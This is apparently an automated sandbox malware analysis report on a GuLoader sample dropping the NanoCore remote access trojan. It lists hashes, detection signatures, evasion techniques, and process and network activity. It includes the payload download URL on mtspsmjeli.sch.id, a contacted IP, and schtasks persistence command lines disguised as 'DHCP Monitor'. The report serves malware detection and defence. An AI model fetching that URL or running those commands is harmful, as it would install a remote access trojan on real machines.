Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Variant.Razy.845229.13077.24263

Overview

General Information

Sample Name:	SecuriteInfo.com.Variant.Razy.845229.13077.24263 (renamed file extension from 24263 to exe)
Analysis ID:	356594
MD5:	532e58083cf5638b05f617fcbbb5d63b
SHA1:	98058e52de678575ff2327d129a58313af4a3fc0
SHA256:	75888910c75a9858137089eb35d48b6b1af6d43817e9a1dbb9fbc409fdaad511
Tags:	GuLoader
Most interesting Screenshot:

Detection

NanoCore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

SecuriteInfo.com.Variant.Razy.845229.13077.exe (PID: 6184 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' MD5: 532E58083CF5638B05F617FCBBB5D63B)

RegAsm.exe (PID: 5276 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5464 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 6536 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegAsm.exe (PID: 6228 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0 MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 4572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 1320 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe' , ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 5276, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp', ProcessId: 5464

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: mtspsmjeli.sch.id	Virustotal: Detection: 12%			Perma Link
Source: http://mtspsmjeli.sch.id/cl/Maly%20nanocre%202021_ECMFFfzt176.bin	Virustotal: Detection: 15%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	Virustotal: Detection: 32%			Perma Link
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	ReversingLabs: Detection: 36%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.26.dr

Networking:

Source: Joe Sandbox View

IP Address: 103.150.60.242 103.150.60.242

Source: Joe Sandbox View

ASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID

Source: global traffic

HTTP traffic detected: GET /cl/Maly%20nanocre%202021_ECMFFfzt176.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: mtspsmjeli.sch.idCache-Control: no-cache

Source: global traffic

Source: unknown

DNS traffic detected: queries for: mtspsmjeli.sch.id

System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00402BF2	0_2_00402BF2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 31_2_02A201C8	31_2_02A201C8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 34_2_00D001C8	34_2_00D001C8

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe, 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCompurgato.exe vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe, 00000000.00000002.732287470.00000000020A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Variant.Razy.845229.13077.exe
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	Binary or memory string: OriginalFilenameCompurgato.exe vs SecuriteInfo.com.Variant.Razy.845229.13077.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.evad.winEXE@13/9@7/2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4572:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{8b6f465d-30c8-4bc5-bfa5-37d69ca0c565}

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA5C9EF9AD60B9A70.TMP

Jump to behavior

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	Virustotal: Detection: 32%
Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe	ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp19AB.tmp'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: RegAsm.pdb source: dhcpmon.exe, dhcpmon.exe.26.dr

Data Obfuscation:

Source: SecuriteInfo.com.Variant.Razy.845229.13077.exe

Static PE information: real checksum: 0x26551 should be: 0x275bd

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00407E1F push 807BA529h; ret	0_2_00407E24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00407A97 push 807BC128h; ret	0_2_00407A9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00405745 push F7686868h; ret	0_2_00405763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Code function: 0_2_00405DEC push DD0F66F5h; ret	0_2_00405DF1

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp167E.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.845229.13077.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
